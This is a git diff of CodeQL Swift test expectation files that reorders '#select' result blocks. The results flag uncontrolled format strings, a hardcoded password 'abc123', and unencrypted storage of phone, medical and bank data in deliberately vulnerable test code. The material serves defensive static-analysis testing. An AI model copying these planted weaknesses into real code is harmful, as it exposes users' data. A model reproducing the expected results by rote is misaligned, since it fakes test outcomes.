UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected index 80758dc286ca..0c1e98bfe7c6 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected @@ -1,30 +1,3 @@ -#select -| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | edges | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | provenance | | @@ -91,3 +64,30 @@ nodes | test.swift:67:34:67:34 | constantPassword | semmle.label | constantPassword | | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths +#select +| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected index e3517d648265..204e2486cc2f 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected @@ -1,143 +1,3 @@ -#select -| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:140:24:140:24 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:149:31:149:31 | [...] | SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:171:31:171:69 | [...] | SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | -| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:50:2:50:10 | ...? | testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | -| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | 